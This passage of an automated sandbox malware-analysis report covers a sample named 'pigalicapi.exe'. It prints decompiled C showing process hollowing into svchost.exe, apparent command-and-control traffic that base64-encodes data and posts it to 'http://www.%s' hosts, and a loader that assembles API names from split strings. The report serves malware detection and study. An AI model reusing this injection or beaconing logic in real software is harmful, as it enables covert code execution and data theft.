Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 67f6eefd186e211514c6403da3bfbfd4d13a57ff0a28058042ffd3782a5fdb61
Instruction ID: 05cb7648b5923e93bfa705c3ba05a15a8be0429bffce4b91882e804ee0f157c8
Opcode Fuzzy Hash: 67f6eefd186e211514c6403da3bfbfd4d13a57ff0a28058042ffd3782a5fdb61
Instruction Fuzzy Hash: 07316CB06002018FDB10BF69C5C46AA7BA1FF44314F15C96EEC158B34AE739D985CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00416950 Relevance: 5.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00416950(intOrPtr* _a4) {
				void* _v16;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t28;
				intOrPtr _t30;
				intOrPtr _t32;
				intOrPtr* _t35;
				intOrPtr* _t40;
				signed int _t45;
				intOrPtr _t46;
				void* _t48;
				intOrPtr* _t49;
				intOrPtr* _t51;

				_t23 = 0x16;
				_t49 = _t48 - 0x1c;
				_t40 = _a4;
				if(_t40 == 0) {
					L4:
					return _t23;
				}
				_t35 =  *_t40;
				if(_t35 == 0) {
					goto L4;
				}
				if(_t35 == 0xffffffff) {
					_t23 = 0;
					goto L4;
				}
				if( *_t35 == 0xc0bab1fd) {
					_t46 = _t35 + 0x14;
					 *_t49 = _t46;
					EnterCriticalSection(??);
					_t24 =  *((intOrPtr*)(_t35 + 0xc));
					_t51 = _t49 - 4;
					if(_t24 == 0) {
						if( *((intOrPtr*)(_t35 + 8)) <=  *((intOrPtr*)(_t35 + 0x10))) {
							L15:
							 *_t51 = _t46;
							LeaveCriticalSection(??);
							E00412210();
							_t23 = 0;
							goto L4;
						}
						_v40 = _t35 + 0x60;
						 *_t51 = _t35 + 0x48;
						_t28 = E00416590( *((intOrPtr*)(_t35 + 0x68)), 0xffffffff, 1);
						if(_t28 != 0) {
							_v32 = _t28;
							 *_t51 = _t46;
							LeaveCriticalSection(??);
							E00412210();
							_t23 = _v32;
							goto L4;
						}
						_t30 =  *((intOrPtr*)(_t35 + 0x10));
						_t45 =  *((intOrPtr*)(_t35 + 8));
						if(_t30 != 0) {
							 *((intOrPtr*)(_t35 + 0x10)) = 0;
							_t45 = _t45 - _t30;
						}
						 *((intOrPtr*)(_t35 + 8)) = 0;
						 *((intOrPtr*)(_t35 + 0xc)) = _t45;
						L9:
						 *_t51 = _t46;
						LeaveCriticalSection(??);
						 *((intOrPtr*)(_t51 - 4)) = _t35 + 0x44;
						_t32 = E00415CC0( *((intOrPtr*)(_t35 + 0x64)), _t35 + 0x2c, _t45);
						E00412210();
						_t23 = _t32;
						goto L4;
					}
					_t45 =  *((intOrPtr*)(_t35 + 8));
					if(_t45 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t35 + 8)) = 0;
					 *((intOrPtr*)(_t35 + 0xc)) = _t24 + _t45;
					goto L9;
				}
				goto L4;
			}

0x00416951
0x0041695b
0x0041695e
0x00416963
0x00416978
0x0041697f
0x0041697f
0x00416965
0x00416969
0x00000000
0x00000000
0x0041696e
0x00416980
0x00000000
0x00416980
0x00416976
0x00416984
0x00416987
0x0041698a
0x00416990
0x00416993
0x00416998
0x004169e6
0x00416a30
0x00416a30
0x00416a33
0x00416a3c
0x00416a41
0x00000000
0x00416a41
0x004169f3
0x004169fa
0x00416a02
0x00416a09
0x00416a48
0x00416a4b
0x00416a4e
0x00416a57
0x00416a5c
0x00000000
0x00416a5c
0x00416a0b
0x00416a0e
0x00416a13
0x00416a15
0x00416a1c
0x00416a1c
0x00416a1e
0x00416a25
0x004169b1
0x004169b1
0x004169b4
0x004169c8
0x004169cb
0x004169d2
0x004169d7
0x00000000
0x004169d7
0x0041699a
0x0041699f
0x00000000
0x00000000
0x004169a7
0x004169ae
0x00000000
0x004169ae
0x00000000

APIs

EnterCriticalSection.KERNEL32 ref: 0041698A
LeaveCriticalSection.KERNEL32 ref: 004169B4

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: c33ec732f80b659cce35f99fb264f15b02028685b48b232e4bea87b4582e7bd9
Instruction ID: 1550a3b30af1b3d5739506e796b0290a9769e07061fc54df4d8527e034a952a5
Opcode Fuzzy Hash: c33ec732f80b659cce35f99fb264f15b02028685b48b232e4bea87b4582e7bd9
Instruction Fuzzy Hash: 35316FB06002018FCB10AF69D5C46AB7BB0EF44350F1A857AEC459F34AE738D895CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D6A0 Relevance: 5.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0040D6C7
free.MSVCRT ref: 0040D711
LeaveCriticalSection.KERNEL32 ref: 0040D71D

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CriticalSection$EnterLeavefree
String ID:
API String ID: 4020351045-0
Opcode ID: 4610c1a5b9857c503adf5da19f6fa4e820977606d10de2c50b457a4da0e04751
Instruction ID: 15fce7b54c8e5e1fc0f85ba65380c6ebfde49fb6f69f57a2b6804990dbcebb8c
Opcode Fuzzy Hash: 4610c1a5b9857c503adf5da19f6fa4e820977606d10de2c50b457a4da0e04751
Instruction Fuzzy Hash: F0018B70B00201CFC700EFB8E58452ABBE0BF44304B94497EE889D7390E778E859CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D590 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0040D5A0
TlsGetValue.KERNEL32 ref: 0040D5C5
GetLastError.KERNEL32 ref: 0040D5D0
LeaveCriticalSection.KERNEL32 ref: 0040D5F0

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 2c84c1ffd8b1c17e096c6591a1ead9b1f70f7a80ca5ad25b355e63b48a2b1e91
Instruction ID: aa3a49ff768a6b075f2888eed2ac29caeab34b7e920cbfe53a71fda84f8aa413
Opcode Fuzzy Hash: 2c84c1ffd8b1c17e096c6591a1ead9b1f70f7a80ca5ad25b355e63b48a2b1e91
Instruction Fuzzy Hash: A6F06D76A00704ABC720BFB9A94855ABBB4FF84350F450539DC9593300D738B819CADA

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: pigalicapi.exePID: 1332, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	12.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1806
Total number of Limit Nodes:	32

Executed Functions

Function 00A20000 Relevance: 70.7, APIs: 2, Strings: 38, Instructions: 729
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 00A2048B
VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 00A204BB

Strings

b, xrefs: 00A20261
ucti, xrefs: 00A2018C
iv, xrefs: 00A201E3
fo, xrefs: 00A20203
A, xrefs: 00A2021E
oc, xrefs: 00A20122
S, xrefs: 00A200B5
tu, xrefs: 00A20134
F, xrefs: 00A2015A
otec, xrefs: 00A2014D
P, xrefs: 00A20144
ee, xrefs: 00A200BE
b, xrefs: 00A200E1
a, xrefs: 00A2010C
a, xrefs: 00A200D1
tu, xrefs: 00A20105
Vi, xrefs: 00A200FA
Lo, xrefs: 00A200CA
Via, xrefs: 00A202EC
G, xrefs: 00A201D6
p, xrefs: 00A200C5
ushI, xrefs: 00A20169
A, xrefs: 00A20115
yA, xrefs: 00A200F3
Li, xrefs: 00A200DA
Cach, xrefs: 00A201CB
Fu, xrefs: 00A20234
t, xrefs: 00A20155
a, xrefs: 00A200EA
a, xrefs: 00A2013B
tNat, xrefs: 00A201DB
st, xrefs: 00A2017B
ctio, xrefs: 00A20245
Syst, xrefs: 00A201EA
o, xrefs: 00A20197
mI, xrefs: 00A201F2
Rt, xrefs: 00A2020D
Ta, xrefs: 00A20257

Memory Dump Source

Source File: 00000001.00000002.639673755.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a20000_pigalicapi.jbxd

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
API String ID: 2032221330-2899676511
Opcode ID: b17be84647fb9a37d8dfb2ad1ea4cf6635db13367d3ffc36cd2cdcf193e76639
Instruction ID: a7db9648cac0223ffa654f1cd0ffb1008e3fcaa02fb6ea8a5244b75f42f05c8a
Opcode Fuzzy Hash: b17be84647fb9a37d8dfb2ad1ea4cf6635db13367d3ffc36cd2cdcf193e76639
Instruction Fuzzy Hash: CD528C715083958FE720CF28D840BABBBE5FF94704F04492EE9C987252E770E985CB56

Uniqueness

Uniqueness Score: -1.00%

Function 024E4BA0 Relevance: 63.8, APIs: 33, Strings: 3, Instructions: 800
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E024E4BA0(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				signed int _v28;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				void* _v48;
				long _v52;
				void* _v56;
				char* _v60;
				CHAR* _v64;
				intOrPtr* _v68;
				intOrPtr _v72;
				int _v76;
				void* _v80;
				void* _v84;
				void* _v88;
				void* _v92;
				void* _v96;
				void* _v100;
				void* _v124;
				void* _v132;
				void* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				char _v420;
				CHAR* _v424;
				int _v428;
				void* _v432;
				long _v436;
				short _v948;
				void* _v952;
				void* _v956;
				void* _v960;
				void* _v964;
				long _v968;
				void* _t306;
				void* _t307;
				void* _t308;
				int _t312;
				int _t318;
				long _t328;
				void* _t333;
				void* _t351;
				long _t358;
				void* _t637;
				void* _t638;

				__imp__CoInitialize(0); // executed
				_v8 = _a4;
				if(_v8 == 0) {
					L83:
					__imp__CoUninitialize();
					return 0;
				} else {
					E024E7B70( &_v36, _v8, 0x1c);
					_t638 = _t637 + 0xc;
					SetEvent( *(_v8 + 0x10));
					_v40 = 0xea60;
					_v44 = _v28;
					while(_v44 <= _v24 && (( *(_v12 + 0x28) & 0x000000ff) != 0 || WaitForSingleObject( *(_v12 + 0x24), 0xa) != 0)) {
						_v64 = _v44 * 0x28 + _v36;
						_v52 = 0x100000;
						_t306 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
						_v48 = _t306;
						_t307 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
						_v56 = _t307;
						_t308 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
						_v60 = _t308;
						if(_v48 == 0 || _v56 == 0 || _v60 == 0) {
							L82:
							_v44 = _v44 + 1;
							continue;
						} else {
							_v68 = _v48;
							_v80 = 0;
							while(_v80 < 0x100) {
								_v80 = _v80 + 1;
							}
							_v72 = _v68 - _v48;
							if( *0x24f18a4 == 2 &&  *((intOrPtr*)(_v16 + 0x453)) > 0 &&  *((intOrPtr*)(_v16 + 0x453)) < 0x100000 - _v72 &&  *((intOrPtr*)(_v16 + 0x457)) != 0) {
								 *_v68 =  *((intOrPtr*)(_v16 + 0x453));
								_v68 = _v68 + 4;
								E024E7B70(_v68,  *((intOrPtr*)(_v16 + 0x457)),  *((intOrPtr*)(_v16 + 0x453)));
								_t638 = _t638 + 0xc;
								_v68 = _v68 +  *((intOrPtr*)(_v16 + 0x453));
							}
							_v72 = _v68 - _v48;
							_t312 = E024E8370(_v48, _v72, _v56, 0x100000); // executed
							_t638 = _t638 + 0x10;
							_v76 = _t312;
							if(_v76 <= 0) {
								L81:
								VirtualFree(_v48, 0, 0x8000); // executed
								VirtualFree(_v56, 0, 0x8000); // executed
								VirtualFree(_v60, 0, 0x8000); // executed
								goto L82;
							} else {
								_v424 = "http://www.%s";
								_t318 = lstrlenA(_v64);
								if(_t318 + lstrlenA(_v424) >= 0x100) {
									goto L81;
								}
								wsprintfA( &_v420, _v424, _v64);
								_t638 = _t638 + 0xc;
								_v428 = 0x100000;
								if(CryptBinaryToStringA(_v56, _v76, 0x40000001, _v60,  &_v428) == 0) {
									goto L81;
								}
								_v956 = 0;
								_v432 = 0;
								MultiByteToWideChar(1, 1,  &_v420, 0xffffffff,  &_v948, 0x100);
								_v952 = 0;
								_t328 = E024E17D0( &_v420,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
								_t638 = _t638 + 0x1c;
								_v436 = _t328;
								if(_v436 <= 0) {
									L79:
									if(_v956 != 0) {
										VirtualFree(_v956, 0, 0x8000); // executed
									}
									goto L81;
								}
								if(_v436 < 0x100 || _v952 >= 0x1f4) {
									if( *0x24f18a4 != 1) {
										goto L70;
									}
									VirtualFree(_v956, 0, 0x8000); // executed
									_v956 = 0;
									_v432 = 0;
									_v960 = 0;
									while(_v960 < 4) {
										_t358 = E024E17D0(_v428,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
										_t638 = _t638 + 0x1c;
										_v436 = _t358;
										if(_v436 > 0x100 || _v952 < 0x1f4) {
											goto L70;
										} else {
											_v960 = _v960 + 1;
											continue;
										}
									}
									goto L70;
								} else {
									L70:
									if(_v436 > 0) {
										EnterCriticalSection(_v12 + 0xc);
										if( *(_v12 + 4) != 0) {
											_v968 =  *(_v12 + 8) + _v436;
											_t333 = VirtualAlloc(0, _v968, 0x3000, 4); // executed
											_v964 = _t333;
											if(_v964 != 0) {
												if(GetTickCount() % 2 != 0) {
													E024E7B70(_v964, _v956, _v436);
													E024E7B70(_v964 + _v436,  *(_v12 + 4),  *(_v12 + 8));
													_t638 = _t638 + 0x18;
												} else {
													E024E7B70(_v964,  *(_v12 + 4),  *(_v12 + 8));
													E024E7B70(_v964 +  *(_v12 + 8), _v956, _v436);
													_t638 = _t638 + 0x18;
												}
												 *(_v12 + 8) =  *(_v12 + 8) + _v436;
												VirtualFree( *(_v12 + 4), 0, 0x8000); // executed
												 *(_v12 + 4) = _v964;
											}
										} else {
											_t351 = VirtualAlloc(0, _v436, 0x3000, 4); // executed
											 *(_v12 + 4) = _t351;
											E024E7B70( *(_v12 + 4), _v956, _v436);
											_t638 = _t638 + 0xc;
											 *(_v12 + 8) = _v436;
										}
										LeaveCriticalSection(_v12 + 0xc);
									}
									goto L79;
								}
							}
						}
					}
					goto L83;
				}
			}

0x024e4bac
0x024e4bb5
0x024e4bbc
0x024e56f0
0x024e56f0
0x024e56fc
0x024e4bc2
0x024e4bcc
0x024e4bd1
0x024e4bdb
0x024e4be1
0x024e4beb
0x024e4bf9
0x024e4c31
0x024e4c34
0x024e4c49
0x024e4c4f
0x024e4c60
0x024e4c66
0x024e4c77
0x024e4c7d
0x024e4c84
0x024e56eb
0x024e4bf6
0x00000000
0x024e4c9e
0x024e4ca1
0x024e4ca4
0x024e4cb6
0x024e4cb3
0x024e4cb3
0x024e52a8
0x024e52b2
0x024e52eb
0x024e52f3
0x024e530e
0x024e5313
0x024e5322
0x024e5322
0x024e532b
0x024e533f
0x024e5344
0x024e5347
0x024e534e
0x024e56b8
0x024e56c3
0x024e56d4
0x024e56e5
0x00000000
0x024e5354
0x024e5354
0x024e5362
0x024e537f
0x00000000
0x00000000
0x024e5397
0x024e539d
0x024e53a0
0x024e53ca
0x00000000
0x00000000
0x024e53d0
0x024e53da
0x024e53fd
0x024e5403
0x024e5439
0x024e543e
0x024e5441
0x024e544e
0x024e569b
0x024e56a2
0x024e56b2
0x024e56b2
0x00000000
0x024e56a2
0x024e545e
0x024e5477
0x00000000
0x00000000
0x024e548b
0x024e5491
0x024e549b
0x024e54a5
0x024e54c0
0x024e54f5
0x024e54fa
0x024e54fd
0x024e550d
0x00000000
0x024e551d
0x024e54ba
0x00000000
0x024e54ba
0x024e550d
0x00000000
0x024e551f
0x024e551f
0x024e5526
0x024e5533
0x024e5540
0x024e5598
0x024e55ae
0x024e55b4
0x024e55c1
0x024e55d8
0x024e5631
0x024e5654
0x024e5659
0x024e55da
0x024e55ef
0x024e5612
0x024e5617
0x024e5617
0x024e566b
0x024e567c
0x024e568b
0x024e568b
0x024e5542
0x024e5552
0x024e555b
0x024e5573
0x024e5578
0x024e5584
0x024e5584
0x024e5695
0x024e5695
0x00000000
0x024e5526
0x024e545e
0x024e534e
0x024e4c84
0x00000000
0x024e4bf9

APIs

CoInitialize.OLE32(00000000), ref: 024E4BAC
SetEvent.KERNEL32(?), ref: 024E4BDB
WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 024E4C19
VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 024E4C49
VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 024E4C60
VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 024E4C77
CoUninitialize.OLE32 ref: 024E56F0

Strings

, xrefs: 024E4EF0
pigalicapi, xrefs: 024E5041, 024E5080
`, xrefs: 024E4BE1

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: AllocVirtual$EventInitializeObjectSingleUninitializeWait
String ID: $`$pigalicapi
API String ID: 1834614700-42206024
Opcode ID: 74825eac3dfefa928f2a4751d4e57e64880b70ad825839da2ef4c2474272fc4a
Instruction ID: b7b2cb0b26d5e75d720c99debc3cde91025aeebad20ff59faf8327fa6ba29119
Opcode Fuzzy Hash: 74825eac3dfefa928f2a4751d4e57e64880b70ad825839da2ef4c2474272fc4a
Instruction Fuzzy Hash: F462C2B1D00214EBEF15DB90DC84FAEB779BF49706F04858EE60A6B281E7705A85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 024E20B0 Relevance: 61.6, APIs: 32, Strings: 3, Instructions: 300
memorystringprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E024E20B0(intOrPtr _a4, signed char _a8, CHAR* _a12) {
				long _v8;
				void* _v12;
				char _v276;
				struct _CONTEXT _v996;
				struct _PROCESS_INFORMATION _v1012;
				intOrPtr _v1016;
				struct _STARTUPINFOA _v1092;
				intOrPtr _v1096;
				void _v1100;
				signed int _v1104;
				CHAR* _t121;
				void* _t128;
				int _t130;
				void* _t132;
				int _t140;
				int _t143;
				int _t145;
				int _t148;
				void* _t263;
				void* _t265;
				void* _t266;

				if(_a4 == 0) {
					L26:
					return 0;
				}
				GetEnvironmentVariableA("SystemRoot",  &_v276, 0x104);
				_t121 = lstrcatA( &_v276, "\\system32\\svchost.exe");
				if(_a12 != 0) {
					lstrcatA( &_v276, " ");
					_t121 = lstrcatA( &_v276, _a12);
				}
				E024E7D20(_t121,  &_v1012, 0, 0x10);
				E024E7D20( &_v1092,  &_v1092, 0, 0x44);
				_t265 = _t263 + 0x18;
				_v1092.cb = 0x44;
				_v1096 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
				_v1016 = _v1096 + ( *(_v1096 + 0x14) & 0x0000ffff) + 0x18;
				_v8 =  *((intOrPtr*)(_v1096 + 0x50));
				_t128 = VirtualAlloc(0, _v8, 0x3000, 0x40); // executed
				_v12 = _t128;
				if(_v12 != 0) {
					_t130 = CreateProcessA(0,  &_v276, 0, 0, 0, 4, 0, 0,  &_v1092,  &_v1012); // executed
					if(_t130 != 0) {
						_t132 = VirtualAllocEx(_v1012.hProcess,  *(_v1096 + 0x34), _v8, 0x3000, 0x40); // executed
						_v1100 = _t132;
						if(_v1100 != 0) {
							L10:
							E024E7B70(_v12, _a4,  *((intOrPtr*)(_v1096 + 0x54)));
							_t266 = _t265 + 0xc;
							_v1104 = 0;
							while(_v1104 < ( *(_v1096 + 6) & 0x0000ffff)) {
								if((_a8 & 0x000000ff) != 0) {
									E024E7B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
									_t266 = _t266 + 0xc;
								} else {
									E024E7B70(_v12 +  *((intOrPtr*)(_v1016 + 0xc + _v1104 * 0x28)), _a4 +  *((intOrPtr*)(_v1016 + 0x14 + _v1104 * 0x28)),  *((intOrPtr*)(_v1016 + 0x10 + _v1104 * 0x28)));
									_t266 = _t266 + 0xc;
								}
								_v1104 = _v1104 + 1;
							}
							E024E26D0(_v12, _v1100);
							_t140 = WriteProcessMemory(_v1012.hProcess, _v1100, _v12, _v8, 0); // executed
							if(_t140 != 0) {
								VirtualFree(_v12, 0, 0x8000); // executed
								_v996.ContextFlags = 0x10007;
								_t143 = GetThreadContext(_v1012.hThread,  &_v996); // executed
								if(_t143 != 0) {
									_t145 = WriteProcessMemory(_v1012.hProcess, _v996.Ebx + 8,  &_v1100, 4, 0); // executed
									if(_t145 != 0) {
										_v996.Eax = _v1100 +  *((intOrPtr*)(_v1096 + 0x28));
										_t148 = SetThreadContext(_v1012.hThread,  &_v996); // executed
										if(_t148 == 0) {
											TerminateProcess(_v1012.hProcess, 0);
											CloseHandle(_v1012.hThread);
											CloseHandle(_v1012.hProcess);
											goto L26;
										}
										ResumeThread(_v1012.hThread); // executed
										return _v1012.hProcess;
									}
									TerminateProcess(_v1012.hProcess, 0);
									CloseHandle(_v1012.hProcess);
									CloseHandle(_v1012.hThread);
									return 0;
								}
								TerminateProcess(_v1012.hProcess, 0);
								CloseHandle(_v1012.hProcess);
								CloseHandle(_v1012.hThread);
								return 0;
							}
							TerminateProcess(_v1012.hProcess, 0);
							CloseHandle(_v1012.hProcess);
							CloseHandle(_v1012.hThread);
							VirtualFree(_v12, 0, 0x8000);
							return 0;
						}
						_v1100 = VirtualAllocEx(_v1012.hProcess, 0, _v8, 0x103000, 0x40);
						if(_v1100 != 0) {
							goto L10;
						}
						TerminateProcess(_v1012.hProcess, 0);
						CloseHandle(_v1012);
						CloseHandle(_v1012.hThread);
						VirtualFree(_v12, 0, 0x8000);
						return 0;
					}
					VirtualFree(_v12, 0, 0x8000);
					return 0;
				} else {
					return 0;
				}
			}

0x024e20bd
0x024e2502
0x00000000
0x024e2502
0x024e20d4
0x024e20e6
0x024e20f0
0x024e20fe
0x024e210f
0x024e210f
0x024e2120
0x024e2133
0x024e2138
0x024e213b
0x024e214e
0x024e2168
0x024e2177
0x024e2187
0x024e218d
0x024e2194
0x024e21c0
0x024e21c8
0x024e21fe
0x024e2204
0x024e2211
0x024e227d
0x024e228f
0x024e2294
0x024e2297
0x024e22b2
0x024e22ce
0x024e235e
0x024e2363
0x024e22d0
0x024e2312
0x024e2317
0x024e2317
0x024e22ac
0x024e22ac
0x024e2376
0x024e2396
0x024e239e
0x024e23ec
0x024e23f2
0x024e240a
0x024e2412
0x024e2460
0x024e2468
0x024e24a6
0x024e24ba
0x024e24c2
0x024e24e2
0x024e24ef
0x024e24fc
0x00000000
0x024e24fc
0x024e24cb
0x00000000
0x024e24d1
0x024e2473
0x024e2480
0x024e248d
0x00000000
0x024e2493
0x024e241d
0x024e242a
0x024e2437
0x00000000
0x024e243d
0x024e23a9
0x024e23b6
0x024e23c3
0x024e23d4
0x00000000
0x024e23da
0x024e222d
0x024e223a
0x00000000
0x00000000
0x024e2245
0x024e2252
0x024e225f
0x024e2270
0x00000000
0x024e2276
0x024e21d5
0x00000000
0x024e2196
0x00000000
0x024e2196

APIs

GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 024E20D4
lstrcatA.KERNEL32(?,\system32\svchost.exe), ref: 024E20E6
lstrcatA.KERNEL32(?,024EC38C), ref: 024E20FE
lstrcatA.KERNEL32(?,00000000), ref: 024E210F
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 024E2187
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 024E21C0
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E21D5
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 024E21FE
VirtualAllocEx.KERNEL32(?,00000000,?,00103000,00000040), ref: 024E2227
TerminateProcess.KERNEL32(?,00000000), ref: 024E2245
CloseHandle.KERNEL32(?), ref: 024E2252
CloseHandle.KERNEL32(?), ref: 024E225F
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024E2270

Strings

D, xrefs: 024E213B
\system32\svchost.exe, xrefs: 024E20DA
SystemRoot, xrefs: 024E20CF

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
String ID: D$SystemRoot$\system32\svchost.exe
API String ID: 1819736980-1559310322
Opcode ID: 5b332cdf3e10b1c750763902a36ab61b9462757af9c839119db1d8ff2e707c1d
